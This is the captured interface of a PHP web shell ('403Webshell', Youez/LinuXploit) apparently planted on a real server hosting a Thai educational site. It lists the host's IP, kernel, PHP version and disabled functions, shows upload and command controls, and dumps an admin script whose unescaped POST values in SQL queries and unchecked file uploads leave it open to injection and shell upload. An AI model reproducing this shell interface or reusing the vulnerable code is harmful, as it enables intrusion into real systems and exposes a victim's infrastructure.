403Webshell
Server IP : 202.29.229.35  /  Your IP : 18.189.171.154
Web Server : Apache
System : Linux aapanel2 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
User : www ( 1001)
PHP Version : 5.5.38
Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /www/wwwroot/www.ivecr2.ac.th/system_admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /www/wwwroot/www.ivecr2.ac.th/system_admin/courses_inser.php
<?php 
session_start();
if($_SESSION['r_statuslogin'] != 1){
 echo '<script language="javascript">alert("สำหรับผู้ดูแลระบบเท่านั้น")</script>';
 echo'<meta http-equiv="refresh" content="0;url=../index.php">';
 exit();
}
/*
		include('connect/connect.php');
		include('connect/function.php');
*/		
		$status_form=$_POST['select'];
		$title=$_POST['title'];
		$clink = $_POST['clink'];
		$c_openSchool= $_POST['c_openSchool'];
		//$tmp_name=$_FILES["fileUpload"]["tmp_name"];
		//$filename=$_FILES["filUpload"]["name"];
		
		$dp_id=$_SESSION['r_workId'];
		$adminID=$_SESSION['r_adID'];
		
		$date=date('Y-m-d');
		$sql="insert into  tbl_courses  (df_ID,df_title,c_link,df_date,count_num,dp_ID,c_openSchool) values (null,'$title','$clink','$date','0','$adminID','$c_openSchool')";
		echo $sql;
		
		$result=mysql_query($sql,$connect1);
			if($result){
									
					$sql1="select max(df_ID) from tbl_courses";
					$result1=mysql_query($sql1,$connect1);
					$rs1=mysql_fetch_array($result1);
					$dfid_max=$rs1['0'];
					
				if($_FILES["fileDOC"]["tmp_name"]<>""){
					$ext=strtolower(end(explode(".",$_FILES["fileDOC"]["name"])));
					$filedoc_ori=$dfid_max."_".date("Ymd")."_".date('his').".".$ext;
				}
					
		$sql2="update  tbl_courses set df_file='$filedoc_ori' where df_ID='$dfid_max' ";	
		$result2=mysql_query($sql2,$connect1);
		//echo "----***".$sql2;	
				copy($_FILES["fileDOC"]["tmp_name"],"file_courses/".$filedoc_ori);
				
				echo "<script language='javascript'>alert('บันทึกข้อมูลเรียบร้อยแล้ว')</script>";
				echo '<meta http-equiv="refresh" content="0;url=index.php?i=courses_Frm">';
			}else{
				echo "<script language='javascript'>alert('ไม่สามารถบันทึกข้อมูลได้')</script>";
				echo '<meta http-equiv="refresh" content="0;url=index.php?i=courses_Frm">';
				}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit